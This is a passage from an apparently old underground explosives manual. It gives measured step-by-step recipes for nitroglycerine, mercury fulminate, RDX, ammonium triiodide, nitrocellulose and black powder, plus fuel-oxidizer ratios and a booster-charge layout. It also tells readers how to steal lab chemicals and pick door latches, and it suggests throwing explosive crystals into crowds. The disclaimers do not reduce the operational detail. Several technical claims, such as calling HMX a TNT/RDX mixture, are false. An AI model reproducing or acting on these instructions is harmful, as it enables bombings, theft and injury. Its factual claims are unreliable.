explosive.  Commercially, it is sometimes mixed with a small amount of
nitroglycerine to increase its sensitivity.  Ammonium nitrate is used in the
"Cold-Paks" or "Instant Cold", available in most drug stores.  The "Cold Paks"
consist of a bag of water, surrounded by a second plastic bag containing the
ammonium nitrate.  To get the ammonium nitrate, simply cut off the top of the
outside bag, remove the plastic bag of water, and save the ammonium nitrate in
a well sealed, airtight container, since it is rather hydroscopic, i.e. it
tends to absorb water from the air.  It is also the main ingredient in many
fertilizers.


2.1     ACQUIRING CHEMICALS

     The first section deals with getting chemicals legally.  This section
deals with "procuring" them.  The best place to steal chemicals is a college.
Many state schools have all of their chemicals out on the shelves in the
labs, and more in their chemical stockrooms.  Evening is the best time to enter
lab buildings, as there are the least number of people in the buildings, and
most of the labs will still be unlocked.  One simply takes a bookbag, wears
a dress shirt and jeans, and tries to resemble a college freshman.  If anyone
asks what such a person is doing, the thief can simply say that he is looking
for the  polymer chemistry lab, or some other chemistry-related department
other than the one they are in.  One can usually find out where the various
labs and  departments in a building are by calling the university.  There
are, of course other techniques for getting into labs after hours, such as
placing a piece of cardboard in the latch of an unused door, such as a back
exit. Then, all one needs to do is come back at a later hour.  Also, before
this is done, terrorists check for security systems.  If one just walks into a
lab, even if there is someone there, and walks out the back exit, and slip the
cardboard in the latch before the door closes, the person in the lab will never
know what happened.  It is also a good idea to observe the building that one
plans to rob at the time that one plans to rob it several days before the
actual theft is done.  This is advisable since the would-be thief should know
when and if the campus security makes patrols through buildings.  Of course, if
none of these methods are successful, there is always section 2.11, but as a
rule, college campus security is pretty poor, and nobody suspects another
person in the building of doing anything wrong, even if they are there at an
odd hour.


2.11     TECHNIQUES FOR PICKING LOCKS

     If it becomes necessary to pick a lock to enter a lab, the world's
most effective lockpick is dynamite, followed by a sledgehammer.  There are
unfortunately, problems with noise and excess structural damage with these
methods.  The next best thing, however, is a set of army issue lockpicks.
These, unfortunately, are difficult to acquire.  If the door to a lab is locked,
but the deadbolt is not engaged, then there are other possibilities.  The rule
here is: if one can see the latch, one can open the door.  There are several
devices which facilitate freeing the latch from its hole in the wall.  Dental
tools, stiff wire ( 20 gauge ), specially bent aluminum from cans, thin pocket-
knives, and credit cards are the tools of the trade.  The way that all these
tools and devices are uses is similar: pull, push, or otherwise move the latch
out of its hole in the wall, and pull the door open.  This is done by sliding
whatever tool that you are using behind the latch, and pulling the latch out
from the wall. To make an aluminum-can lockpick, terrorists can use an aluminum
can and carefully cut off the can top and bottom. Cut off the ragged ends of the
can.  Then, cut the open-ended cylinder so that it can be flattened out into a
single long rectangle.  This should then be cut into inch wide strips.  Fold the
strips in 1/4 inch increments (1).  One will have a long quadruple-thick 1/4
inch wide strip of aluminum.  This should be folded into an L-shape, a J-shape,
or a U-shape.  This is done by folding. The pieces would look like this:


 (1)

        _________________________________________________________    v
1/4     |_______________________________________________________|    |
1/4     |_______________________________________________________|    | 1 inch
1/4     |_______________________________________________________|    |
1/4     |_______________________________________________________|    |
                                             ^

     Fold along lines to make a single quadruple-thick piece of
aluminum.  This should then be folded to produce an L,J,or U shaped
device that looks like this:


                      _________________________________________
                     /|________________________________________|
                    | |
                    | |          L-shaped
                    | |
                    | |
                    | |
                    |_|



                       ____________________________
                      /|___________________________|
                     | |
                     | |     J-shaped
                     | |
                     | |_______
                      \|_______|



                       ____________________
                      /|___________________|
                     | |
                     | |
                     | |     U-shaped
                     | |
                     | |
                     | |
                     | |___________________
                      \|___________________|


     All of these devices should be used to hook the latch of a door and
pull the latch out of its hole.  The folds in the lockpicks will be between
the door and the wall, and so the device will not unfold, if it is made
properly.


2.2      LIST OF USEFUL HOUSEHOLD CHEMICALS AND THEIR AVAILABILITY

     Anyone can get many chemicals from hardware stores, supermarkets,
and drug stores to get the materials to make explosives or other dangerous
compounds.  A would-be terrorist would merely need a station wagon and some
money to acquire many of the chemicals named here.



Chemical                   Used In                         Available at
________                   _______                         ____________

________________________________________________________________________________
alcohol, ethyl *           alcoholic beverages             liquor stores
                           solvents (95% min. for both)    hardware stores
________________________________________________________________________________
ammonia +                  CLEAR household                 supermarkets,
                           ammonia                         7 - Eleven
________________________________________________________________________________
ammonium                   instant-cold                    drug stores,
nitrate                    paks, fertilizers               medical supply stores
________________________________________________________________________________
nitrous oxide              pressurizing                    party supply stores
                           drinks and whip cream
________________________________________________________________________________
magnesium                  firestarters                    surplus stores,
                                                           camping stores
________________________________________________________________________________
lecithin                   vitamins?                       pharmacies, drug
                                                           stores
________________________________________________________________________________
mineral oil                cooking, laxative               supermarket,
                                                           drug store
________________________________________________________________________________
mercury @                  mercury thermometers            supermarkets,
                                                           hardware stores
________________________________________________________________________________
sulfuric acid              uncharged car                   automotive stores
                           batteries
________________________________________________________________________________
glycerine                  ?                               pharmacies, drug
                                                           stores
________________________________________________________________________________
sulfur                     gardening                       gardening store,
                                                           hardware stores?
________________________________________________________________________________
charcoal                   charcoal grills,                supermarkets
                           gardening                       gardening stores
________________________________________________________________________________
sodium nitrate             fertilizer                      gardening store
________________________________________________________________________________
cellulose                  first aid                       drug stores,
(cotton)                                                   medical supply stores
________________________________________________________________________________
strontium nitrate          road flares                     surplus stores,
                                                           auto stores
________________________________________________________________________________
fuel oil                   kerosene stoves                 surplus stores,
(kerosene)                                                 camping stores
________________________________________________________________________________
bottled gas                propane stoves                  surplus stores,
                                                           camping stores
________________________________________________________________________________
potassium permanganate     water purification              purification plants
________________________________________________________________________________
hexamine or                hexamine stoves                 surplus stores
methenamine                (camping)                       (camping stores?)
________________________________________________________________________________
nitric acid ^              cleaning printing               printing shops
                           plates                          photography stores?
________________________________________________________________________________
iodine &                   first aid                       drug stores
________________________________________________________________________________
sodium perchlorate         solidox pellets                 hardware stores
                           for cutting torches
________________________________________________________________________________

Notes: 
     * ethyl alcohol is mixed with methyl alcohol when it is used as a
       solvent.  Methyl alcohol is very poisonous. Solvent alcohol
       must be at least 95% ethyl alcohol if it is used to make mercury
       fulminate.  Methyl alcohol may prevent mercury fulminate from forming.


     + Ammonia, when bought in stores comes in a variety of forms.  The
       pine and cloudy ammonias should not be bought; only the clear
       ammonia should be used to make ammonium triiodide crystals.


     @ Mercury thermometers are becoming a rarity, unfortunately.  They
       may be hard to find in most stores.  Mercury is also used in
       mercury switches, which are available at electronics stores.
       Mercury is a hazardous substance, and should be kept in the
       thermometer or mercury switch until used.  It gives off mercury
       vapors which will cause brain damage if inhaled.  For this reason,
       it is a good idea not to spill mercury, and to always use it
       outdoors.  Also, do not get it in an open cut; rubber gloves will
       help prevent this.


     ^ Nitric acid is very difficult to find nowadays.  It is usually
       stolen by bomb makers, or made by the process described in a later
       section.  A desired concentration for making explosives about 70%.


     & The iodine sold in drug stores is usually not the pure crystaline
       form that is desired for producing ammonium triiodide crystals.
       To obtain the pure form, it must usually be acquired by a doctor's
       prescription, but this can be expensive.  Once again, theft is the
       means that terrorists result to.


2.3      PREPARATION OF CHEMICALS


2.31    NITRIC ACID

     There are several ways to make this most essential of all acids for
explosives.  One method by which it could be made will be presented.  Once
again, be reminded that these methods SHOULD NOT BE CARRIED OUT!!


Materials:                    Equipment
__________                    _________

sodium nitrate                adjustable heat source
   or
potassium nitrate             retort

distilled water               ice bath

concentrated                  stirring rod
sulfuric acid
                              collecting flask with stopper



1) Pour 32 milliliters of concentrated sulfuric acid into the retort.

2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of potassium
nitrate. and add this to the acid slowly.  If it all does not dissolve,
carefully stir the solution with a glass rod until it does.

3) Place the open end of the retort into the collecting flask, and place the
   collecting flask in the ice bath.

4) Begin heating the retort, using low heat.  Continue heating until liquid
   begins to come out of the end of the retort.  The liquid that forms is nitric
   acid.  Heat until the precipitate in the bottom of the retort is almost dry,
   or until no more nitric acid is forming.  CAUTION: If the acid is headed too
   strongly, the nitric acid will decompose as soon as it is formed.  This
   can result in the production of highly flammable and toxic gasses that may
   explode.  It is a good idea to set the above apparatus up, and then get
   away from it.


     Potassium nitrate could also be obtained from store-bought black powder,
simply by dissolving black powder in boiling water and filtering out the sulfur
and charcoal.  To obtain 68 g of potassium nitrate, it would be necessary to
dissolve about 90 g of black powder in about one litre of boiling water.  Filter
the dissolved solution through filter paper in a funnel into a jar until the
liquid that pours through is clear.  The charcoal and sulfur in black powder
are insoluble in water, and so when the solution of water is allowed to
evaporate, potassium nitrate will be left in the jar.


2.32     SULFURIC ACID

     Sulfuric acid is far too difficult to make outside of a laboratory or
industrial plant.  However, it is readily available in an uncharged car battery.
A person wishing to make sulfuric acid would simply remove the top of a car
battery and pour the acid into a glass container.  There would probably be
pieces of lead from the battery in the acid which would have to be removed,
either by boiling or filtration.  The concentration of the sulfuric acid can
also be increased by boiling it; very pure sulfuric acid pours slightly faster
than clean motor oil.


2.33     AMMONIUM NITRATE

     Ammonium nitrate is a very powerful but insensitive high-order
explosive.  It could be made very easily by pouring nitric acid into a large
flask in an ice bath.  Then, by simply pouring household ammonia into the flask
and running away, ammonium nitrate would be formed.  After the materials have
stopped reacting, one would simply have to leave the solution in a warm place
until all of the water and any unneutralized ammonia or acid have evaporated.
There would be a fine powder formed, which would be ammonium nitrate.  It must
be kept in an airtight container, because of its tendency to pick up water from
the air.  The crystals formed in the above process would have to be heated VERY
gently to drive off the remaining water.


3.0     EXPLOSIVE RECIPES

     Once again, persons reading this material MUST NEVER ATTEMPT TO PRODUCE
ANY OF THE EXPLOSIVES DESCRIBED HEREIN.  IT IS ILLEGAL AND EXTREMELY DANGEROUS
TO ATTEMPT TO DO SO.  LOSS OF LIFE AND/OR LIMB COULD EASILY OCCUR AS A RESULT
OF ATTEMPTING TO PRODUCE EXPLOSIVE MATERIALS.

     These recipes are theoretically correct, meaning that an individual
could conceivably produce the materials described.  The methods here are usually
scaled-down industrial procedures.


3.01     EXPLOSIVE THEORY

     An explosive is any material that, when ignited by heat or shock,
undergoes rapid decomposition or oxidation.  This process releases energy that
is stored in the material in the form of heat and light, or by breaking down
into gaseous compounds that occupy a much larger volume that the original piece
of material.  Because this expansion is very rapid, large volumes of air are
displaced by the expanding gasses.  This expansion occurs at a speed greater
than the speed of sound, and so a sonic boom occurs.  This explains the
mechanics behind an explosion.  Explosives occur in several forms: high-order
explosives which detonate, low order explosives, which burn, and primers, which
may do both.

     High order explosives detonate.  A detonation occurs only in a high
order explosive.  Detonations are usually incurred by a shockwave that passes
through a block of the high explosive material.  The shockwave breaks apart
the molecular bonds between the atoms of the substance, at a rate approximately
equal to the speed of sound traveling through that material.  In a high
explosive, the fuel and oxodizer are chemically bonded, and the shockwave breaks
apart these bonds, and re-combines the two materials to produce mostly gasses.
T.N.T., ammonium nitrate, and R.D.X. are examples of high order explosives.

     Low order explosives do not detonate; they burn, or undergo oxidation.
when heated, the fuel(s) and oxodizer(s) combine to produce heat, light, and
gaseous products.  Some low order materials burn at about the same speed under
pressure as they do in the open, such as blackpowder. Others, such as gunpowder,
which is correctly called nitrocellulose, burn much faster and hotter when they
are in a confined space, such as the barrel of a firearm; they usually burn
much slower than blackpowder when they are ignited in unpressurized conditions.
Black powder, nitrocellulose, and flash powder are good examples of low order
explosives.

     Primers are peculiarities to the explosive field.  Some of them, such as
mercury filminate, will function as a low or high order explosive.  They are
usually more sensitive to friction, heat, or shock, than the high or low
explosives.  Most primers perform like a high order explosive, except that they
are much more sensitive.  Still others merely burn, but when they are confined,
they burn at a great rate and with a large expansion of gasses and a shockwave.
Primers are usually used in a small amount to initiate, or cause to decompose,
a high order explosive, as in an artillery shell.  But, they are also frequently
used to ignite a low order explosive;  the gunpowder in a bullet is ignited by
the detonation of its primer.


3.1     IMPACT EXPLOSIVES

     Impact explosives are often used as primers.  Of the ones discussed
here, only mercury fulminate and nitroglycerine are real explosives; Ammonium
triiodide crystals decompose upon impact, but they release little heat and no
light.  Impact explosives are always treated with the greatest care, and even
the stupidest anarchist never stores them near any high or low explosives.


3.11       AMMONIUM TRIIODIDE CRYSTALS

     Ammonium triiodide crystals are foul-smelling purple colored crystals
that decompose under the slightest amount of heat, friction, or shock, if they
are made with the purest ammonia (ammonium hydroxide) and iodine.  Such
crystals are said to detonate when a fly lands on them, or when an ant walks
across them.  Household ammonia, however, has enough impurities, such as soaps
and abrasive agents, so that the crystals will detonate when thrown,crushed, or
heated.  Upon detonation, a loud report is heard, and a cloud of purple iodine
gas appears about the detonation site.  Whatever the unfortunate surface that
the crystal was detonated upon will usually be ruined, as some of the iodine
in the crystal is thrown about in a solid form, and iodine is corrosive.  It
leaves nasty, ugly, permanent brownish-purple stains on whatever it contacts.
Iodine gas is also bad news, since it can damage lungs, and it settles to the
ground and stains things there also.  Touching iodine leaves brown stains on
the skin that last for about a week, unless they are immediately and vigorously
washed off.  While such a compound would have little use to a serious terrorist,
a vandal could utilize them in damaging property.  Or, a terrorist could throw
several of them into a crowd as a distraction, an action which would possibly
injure a few people, but frighten almost anyone, since a small crystal that
not be seen when thrown produces a rather loud explosion.  Ammonium triiodide
crystals could be produced in the following manner:

     Materials                Equipment
     _________                _________

     iodine crystals          funnel and filter paper

                              paper towels
     clear ammonia
     (ammonium hydroxide,     two throw-away glass jars
      for the suicidal)


1) Place about two teaspoons of iodine into one of the glass jars.  The jars
   must both be throw away because they will never be clean again.

2) Add enough ammonia to completely cover the iodine.

3) Place the funnel into the other jar, and put the filter paper in the funnel.
   The technique for putting filter paper in a funnel is taught in every basic
   chemistry lab class: fold the circular paper in half, so that a semi-circle
   is formed.  Then, fold it in half again to form a triangle with one curved
   side.  Pull one thickness of paper out to form a cone, and place the cone
   into the funnel.

4) After allowing the iodine to soak in the ammonia for a while, pour the
   solution into the paper in the funnel through the filter paper.

5) While the solution is being filtered, put more ammonia into the first jar
   to wash any remaining crystals into the funnel as soon as it drains.

6) Collect all the purplish crystals without touching the brown filter paper,
   and place them on the paper towels to dry for about an hour.  Make sure that
   they are not too close to any lights or other sources of heat, as they could
   well detonate. While they are still wet, divide the wet material into about
   eight chunks.

7) After they dry, gently place the crystals onto a one square inch piece of
   duct tape.  Cover it with a similar piece, and gently press the duct tape
   together around the crystal, making sure not to press the crystal itself.
   Finally, cut away most of the excess duct tape with a pair of scissors, and
   store the crystals in a cool dry safe place.  They have a shelf life of
   about a week, and they should be stored in individual containers that can be
   thrown away, since they have a tendency to slowly decompose, a process which
   gives off iodine vapors, which will stain whatever they settle on.  One
   possible way to increase their shelf life is to store them in airtight
   containers.  To use them, simply throw them against any surface or place them
   where they will be stepped on or crushed.


3.12      MERCURY FULMINATE

     Mercury fulminate is perhaps one of the oldest known initiating
compounds.  It can be detonated by either heat or shock, which would make it
of infinite value to a terrorist.  Even the action of dropping a crystal of
the fulminate causes it to explode.  A person making this material would
probably use the following procedure:


     MATERIALS               EQUIPMENT
     _________               _________

     mercury (5 g)           glass stirring rod

     concentrated nitric     100 ml beaker (2)
     acid (35 ml)
                             adjustable heat source
     ethyl alcohol (30 ml)

     distilled water         blue litmus paper

                             funnel and filter paper

1) In one beaker, mix 5 g of mercury with 35 ml of concentrated nitric acid,
   using the glass rod.

2) Slowly heat the mixture until the mercury is dissolved, which is when the
   solution turns green and boils.

3) Place 30 ml of ethyl alcohol into the second beaker, and slowly and carefully
    add all of the contents of the first beaker to it.  Red and/or brown fumes
   should appear.  These fumes are toxic and flammable.

4) After thirty to forty minutes, the fumes should turn white, indicating that
   the reaction is near completion.  After ten more minutes, add 30 ml of the
   distilled water to the solution.

5) Carefully filter out the crystals of mercury fulminate from the liquid
   solution.  Dispose of the solution in a safe place, as it is corrosive
   and toxic.

6) Wash the crystals several times in distilled water to remove as much excess
   acid as possible.  Test the crystals with the litmus paper until they are
   neutral.   This will be when the litmus paper stays blue when it touches the
   wet crystals

7) Allow the crystals to dry, and store them in a safe place, far away from
   any explosive or flammable material.


     This procedure can also be done by volume, if the available mercury
cannot be weighed.  Simply use 10 volumes of nitric acid and 10 volumes of
ethanol to every one volume of mercury.


3.13       NITROGLYCERINE

     Nitroglycerine is one of the most sensitive explosives, if it is not
the most sensitive.  Although it is possible to make it safely, it is difficult.
Many a young anarchist has been killed or seriously injured while trying to
make the stuff.  When Nobel's factories make it, many people were killed by the
all-to-frequent factory explosions.  Usually, as soon as it is made, it is
converted into a safer substance, such as dynamite.  An idiot who attempts
to make nitroglycerine would use the following procedure:


     MATERIAL               EQUIPMENT
     ________               _________

     distilled water        eye-dropper

     table salt             100 ml beaker

     sodium bicarbonate     200-300 ml beakers (2)

     concentrated nitric    ice bath container
     acid (13 ml)               ( a plastic bucket serves well )

     concentrated sulfuric  centigrade thermometer
     acid (39 ml)

     glycerine              blue litmus paper


1) Place 150 ml of distilled water into one of the 200-300 ml beakers.

2) In the other 200-300 ml beaker, place 150 ml of distilled water and about
   a spoonful of sodium bicarbonate, and stir them until the sodium bicarbonate
   dissolves.  Do not put so much sodium bicarbonate in the water so that some
   remains undissolved.

3) Create an ice bath by half filling the ice bath container with ice, and
   adding table salt.  This will cause the ice to melt, lowering the overall
   temperature.

4) Place the 100 ml beaker into the ice bath, and pour the 13 ml of concentrated
   nitric acid into the 100 ml beaker.  Be sure that the beaker will not spill
   into the ice bath, and that the ice bath will not overflow into the beaker
   when more materials are added to it.  Be sure to have a large enough ice bath
   container to add more ice.  Bring the temperature of the acid down to about 20
   degrees centigrade or less.

5) When the nitric acid is as cold as stated above, slowly and carefully add the
   39 ml of concentrated sulfuric acid to the nitric acid.  Mix the two acids
   together, and cool the mixed acids to 10 degrees centigrade.  It is a good
   idea to start another ice bath to do this.

6) With the eyedropper, slowly put the glycerine into the mixed acids, one drop
   at a time.  Hold the thermometer along the top of the mixture where the mixed
   acids and glycerine meet.  DO NOT ALLOW THE TEMPERATURE TO GET ABOVE 30
   DEGREES CENTIGRADE; IF THE TEMPERATURE RISES ABOVE THIS TEMPERATURE, RUN
   LIKE HELL!!!  The glycerine will start to nitrate immediately, and the
   temperature will immediately begin to rise.  Add glycerine until there is a
   thin layer of glycerine on top of the mixed acids.  It is always safest to
   make any explosive in small quantities.

7) Stir the mixed acids and glycerine for the first ten minutes of nitration,
   adding ice and salt to the ice bath to keep the temperature of the solution
   in the 100 ml beaker well below 30 degrees centigrade.  Usually, the
   nitroglycerine will form on the top of the mixed acid solution, and the
   concentrated sulfuric acid will absorb the water produced by the reaction.

8) When the reaction is over, and when the nitroglycerine is well below 30
   degrees centigrade, slowly and carefully pour the solution of nitroglycerine
   and mixed acid into the distilled water in the beaker in step 1.  The
   nitroglycerine should settle to the bottom of the beaker, and the water-acid
   solution on top can be poured off and disposed of. Drain as much of the
   acid-water solution as possible without disturbing the nitroglycerine.

9) Carefully remove the nitroglycerine with a clean eye-dropper, and place it
   into the beaker in step 2.  The sodium bicarbonate solution will eliminate
   much of the acid, which will make the nitroglycerine more stable, and less
   likely to explode for no reason, which it can do.  Test the nitroglycerine
   with the litmus paper until the litmus stays blue.  Repeat this step if
   necessary, and use new sodium bicarbonate solutions as in step 2.

10) When the nitroglycerine is as acid-free as possible, store it in a clean
    container in a safe place.  The best place to store nitroglycerine is
    far away from anything living, or from anything of any value.
    Nitroglycerine can explode for no apparent reason, even if it is stored
    in a secure cool place.


3.14     PICRATES

     Although the procedure for the production of picric acid, or
trinitrophenol has not yet been given, its salts are described first, since they
are extremely sensitive, and detonate on impact.  By mixing picric acid with
metal hydroxides, such as sodium or potassium hydroxide, and evaporating the
water, metal picrates can be formed.  Simply obtain picric acid, or produce it,
and mix it with a solution of (preferably) potassium hydroxide, of a mid range
molarity.  (about 6-9 M)  This material, potassium picrate, is impact-sensitive,
and can be used as an initiator for any type of high explosive.


3.2      LOW-ORDER EXPLOSIVES

     There are many low-order explosives that can be purchased in stores
and used in explosive devices.  However, it is possible that a wise gun store
owner would not sell these substances to a suspicious-looking individual.  Such
an individual would then be forced to resort to making his own low-order
explosives.


3.21     BLACK POWDER


     First made by the Chinese for use in fireworks, black powder was first
used in weapons and explosives in the 12th century.  It is very simple to make,
but it is not very powerful or safe.  Only about 50% of black powder is
converted to hot gasses when it is burned; the other half is mostly very fine
burned particles.  Black powder has one major problem: it can be ignited by
static electricity.  This is very bad, and it means that the material must be
made with wooden or clay tools.  Anyway, a misguided individual could
manufacture black powder at home with the following procedure:


     MATERIALS               EQUIPMENT
     _________               _________

     potassium               clay grinding bowl
     nitrate (75 g)               and clay grinder

       or                         or

     sodium                  wooden salad bowl
     nitrate (75 g)               and wooden spoon

     sulfur (10 g)           plastic bags (3)

     charcoal (15 g)         300-500 ml beaker (1)

     distilled water         coffee pot or heat source



1) Place a small amount of the potassium or sodium nitrate in the grinding bowl
   and grind it to a very fine powder.  Do this to all of the potassium or
   sodium nitrate, and store the ground powder in one of the plastic bags.

2) Do the same thing to the sulfur and charcoal, storing each chemical in a
   separate plastic bag.

3) Place all of the finely ground potassium or sodium nitrate in the beaker, and
    add just enough boiling water to the chemical to get it all wet.

4) Add the contents of the other plastic bags to the wet potassium or sodium
   nitrate, and mix them well for several minutes.  Do this until there is no
   more visible sulfur or charcoal, or until the mixture is universally black.

5) On a warm sunny day, put the beaker outside in the direct sunlight.  Sunlight
   is really the best way to dry black powder, since it is never too hot, but it
   is hot enough to evaporate the water.

6) Scrape the black powder out of the beaker, and store it in a safe container.
   Plastic is really the safest container, followed by paper.  Never store black
   powder in a plastic bag, since plastic bags are prone to generate static
   electricity.


3.22     NITROCELLULOSE

     Nitrocellulose is usually called "gunpowder" or "guncotton".  It is more
stable than black powder, and it produces a much greater volume of hot gas.  It
also burns much faster than black powder when it is in a confined space.
Finally, nitrocellulose is fairly easy to make, as outlined by the following
procedure:


     MATERIALS                    EQUIPMENT
     _________                    _________

     cotton (cellulose)           two (2) 200-300 ml beakers

     concentrated                 funnel and filter paper
     nitric acid
                                  blue litmus paper
     concentrated
     sulfuric acid

     distilled water

1) Pour 10 cc of concentrated sulfuric acid into the beaker.  Add to this
   10 cc of concentrated nitric acid.

2) Immediately add 0.5 gm of cotton, and allow it to soak for exactly 3
   minutes.

3) Remove the nitrocellulose and prepare water to wash it in.

4) Allow the material to dry, and then re-wash it.

5) After the cotton is neutral when tested with litmus paper, it is ready to
   be dried and stored.


3.23     FUEL-OXODIZER MIXTURES

     There are nearly an infinite number of fuel-oxodizer mixtures that can
be produced by a misguided individual in his own home.  Some are very effective
and dangerous, while others are safer and less effective.  A list of working
fuel-oxodizer mixtures will be presented, but the exact measurements of each
compound are debatable for maximum effectiveness.  A rough estimate will be
given of the percentages of each fuel and oxodizer:



Oxodizer, % by weight          Fuel, % by weight    Speed #     Notes
________________________________________________________________________________
 potassium chlorate 67%             sulfur 33%           5     friction/
                                                               impact sensitive
                                                               rather unstable
________________________________________________________________________________
 potassium chlorate 50%              sugar 35%           5     fairly slow
                                  charcoal 15%                 burning;
                                                               unstable
________________________________________________________________________________
 potassium chlorate 50%             sulfur 25%           8     extremely
                                  magnesium or                 unstable!
                             aluminum dust 25%
________________________________________________________________________________
 potassium chlorate 67%           magnesium or           8     unstable
                             aluminum dust 33%
________________________________________________________________________________
 sodium nitrate 65%         magnesium dust 30%           ?     unpredictable
                                     sulfur 5%                 burn rate
________________________________________________________________________________
 potassium permanganate 60%      glycerine 40%            4    delay before
                                                               ignition depends
 WARNING: IGNITES SPONTANEOUSLY WITH GLYCERINE!!!              upon grain size
________________________________________________________________________________
 potassium permanganate 67%         sulfur 33%            5    unstable
________________________________________________________________________________
 potassium permangenate 60%         sulfur 20%            5    unstable
                                  magnesium or
                             aluminum dust 20%
________________________________________________________________________________
 potassium permanganate 50%          sugar 50%            3    ?
________________________________________________________________________________
 potassium nitrate 75%            charcoal 15%            7    this is
                                    sulfur 10%                 black powder!
________________________________________________________________________________
 potassium nitrate 60%           powdered iron            1    burns very hot
                                            or
                                 magnesium 40%
________________________________________________________________________________
 potassium chlorate 75%             phosphorus            8    used to make
                             sesquisulfide 25%                 strike-anywhere
                                                               matches
________________________________________________________________________________
 ammonium perchlorate 70%    aluminum dust 30%            6    solid fuel for
                             + small amount of                 space shuttle
                             iron oxide
________________________________________________________________________________
 potassium perchlorate 67%        magnesium or           10    flash powder
(sodium perchlorate)         aluminum dust 33%         
________________________________________________________________________________
 potassium perchlorate 60%        magnesium or            8    alternate
(sodium perchlorate)         aluminum dust 20%                 flash powder
                                    sulfur 20%
________________________________________________________________________________
 barium nitrate 30%          aluminum dust 30%            9    alternate
potassium perchlorate 30%                                      flash powder
________________________________________________________________________________
 barium peroxide 90%         magnesium dust 5%           10    alternate
                              aluminum dust 5%                 flash powder
________________________________________________________________________________
 potassium perchlorate 50%          sulfur 25%            8    slightly
                                  magnesium or                 unstable
                             aluminum dust 25%
________________________________________________________________________________
 potassium chlorate 67%     red phosphorus 27%            7    very
calcium carbonate 3%                 sulfur 3%                 unstable!
                                                               impact sensitive
 ________________________________________________________________________________

 potassium permanganate 50% powdered sugar 25%            7    unstable;
                                   aluminum or                 ignites if
                            magnesium dust 25%                 it gets wet!
________________________________________________________________________________
 potassium chlorate 75%      charcoal dust 15%            6    unstable
                                    sulfur 10%
________________________________________________________________________________


NOTE: Mixtures that uses substitutions of sodium perchlorate for potassium
      perchlorate become moisture-absorbent and less stable.

     The higher the speed number, the faster the fuel-oxodizer mixture burns
AFTER ignition.  Also, as a rule, the finer the powder, the faster the rate of
burning.

     As one can easily see, there is a wide variety of fuel-oxodizer mixtures
that can be made at home.  By altering the amounts of fuel and oxodizer(s),
different burn rates can be achieved, but this also can change the sensitivity of

the mixture.


3.24    PERCHLORATES

     As a rule, any oxidizable material that is treated with perchloric acid
will become a low order explosive.  Metals, however, such as potassium or
sodium, become excellent bases for flash-type powders.  Some materials that can
be perchlorated are cotton, paper, and sawdust.  To produce potassium or sodium
perchlorate, simply acquire the hydroxide of that metal, e.g. sodium or
potassium hydroxide.  It is a good idea to test the material to be perchlorated
with a very small amount of acid, since some of the materials tend to react
explosively when contacted by the acid.  Solutions of sodium or potassium
hydroxide are ideal.


3.3     HIGH-ORDER EXPLOSIVES

     High order explosives can be made in the home without too much
difficulty.  The main problem is acquiring the nitric acid to produce the high
explosive.  Most high explosives detonate because their molecular structure is
made up of some fuel and usually three or more NO2 ( nitrogen dioxide )
molecules.  T.N.T., or Tri-Nitro-Toluene is an excellent example of such a
material.  When a shock wave passes through an molecule of T.N.T., the
nitrogen dioxide bond is broken, and the oxygen combines with the fuel, all in
a matter of microseconds.  This accounts for the great power of nitrogen-based
explosives.  Remembering that these procedures are NEVER TO BE CARRIED OUT,
several methods of manufacturing high-order explosives in the home are listed.



3.31     R.D.X.

     R.D.X., also called cyclonite, or composition C-1 (when mixed with
plasticisers) is one of the most valuable of all military explosives.  This is
because it has more than 150% of the power of T.N.T., and is much easier to
detonate.  It should not be used alone, since it can be set off by a not-too
severe shock.  It is less sensitive than mercury fulminate, or nitroglycerine,
but it is still too sensitive to be used alone.  R.D.X. can be made by the
surprisingly simple method outlined hereafter.  It is much easier to make in the
home than all other high explosives, with the possible exception of ammonium
nitrate.


     MATERIALS                    EQUIPMENT
     _________                    _________

     hexamine                     500 ml beaker
       or
     methenamine                  glass stirring rod
     fuel tablets (50 g)
                                  funnel and filter paper
     concentrated
     nitric acid (550 ml)         ice bath container
                                  (plastic bucket)
     distilled water
                                  centigrade thermometer
     table salt
                                  blue litmus paper
     ice

     ammonium nitrate

1) Place the beaker in the ice bath, (see section 3.13, steps 3-4) and carefully
   pour 550 ml of concentrated nitric acid into the beaker.

2) When the acid has cooled to below 20 degrees centigrade, add small amounts of
   the crushed fuel tablets to the beaker.  The temperature will rise, and it
   must be kept below 30 degrees centigrade, or dire consequences could result.
   Stir the mixture.

3) Drop the temperature below zero degrees centigrade, either by adding more ice
   and salt to the old ice bath, or by creating a new ice bath.  Or, ammonium
   nitrate could be added to the old ice bath, since it becomes cold when it is
   put in water. Continue stirring the mixture, keeping the temperature below
   zero degrees centigrade for at least twenty minutes

4) Pour the mixture into a litre of crushed ice.  Shake and stir the mixture,
   and allow it to melt.  Once it has melted, filter out the crystals, and
   dispose of the corrosive liquid.

5) Place the crystals into one half a litre of boiling distilled water.  Filter
   the crystals, and test them with the blue litmus paper.  Repeat steps 4 and 5
   until the litmus paper remains blue.  This will make the crystals more stable
   and safe.

6) Store the crystals wet until ready for use.  Allow them to dry completely
   using them.  R.D.X. is not stable enough to use alone as an explosive.

7) Composition C-1 can be made by mixing 88.3% R.D.X. (by weight) with 11.1%
   mineral oil, and 0.6% lecithin.  Kneed these material together in a plastic
   bag.  This is a good way to desensitize the explosive.

8) H.M.X. is a mixture of T.N.T. and R.D.X.; the ratio is 50/50, by weight.
   it is not as sensitive, and is almost as powerful as straight R.D.X.

9) By adding ammonium nitrate to the crystals of R.D.X. after step 5, it should
   be possible to desensitize the R.D.X., and increase its power, since ammonium
   nitrate is very insensitive and powerful.  Soduim or potassium nitrate could
   also be added; a small quantity is sufficient to stabilize the R.D.X.

10) R.D.X. detonates at a rate of 8550 meters/second when it is compressed to a
    density of 1.55 g/cubic cm.


3.32      AMMONIUM NITRATE

     Ammonium nitrate could be made by a terrorist according to the hap-
hazard method in section 2.33, or it could be stolen from a construction site,
since it is usually used in blasting, because it is very stable and insensitive
to shock and heat.  A terrorist could also buy several Instant Cold-Paks from a
drug store or medical supply store.  The major disadvantage with ammonium
nitrate, from a terrorist's point of view, would be detonating it.  A rather
powerful priming charge must be used, and usually with a booster charge.  The
diagram below will explain.

              _______________________________________
             |       |                               |
      _______|       |                               |
     |       | T.N.T.|     ammonium nitrate          |
     |primer |booster|                               |
     |_______|       |                               |
          |          |                               |
          |__________|_______________________________|



     The primer explodes, detonating the T.N.T., which detonates, sending
a tremendous shockwave through the ammonium nitrate, detonating it.


3.33     ANFOS

     ANFO is an acronym for Ammonium Nitrate - Fuel Oil Solution.  An ANFO
solves the only other major problem with ammonium nitrate: its tendency to pick
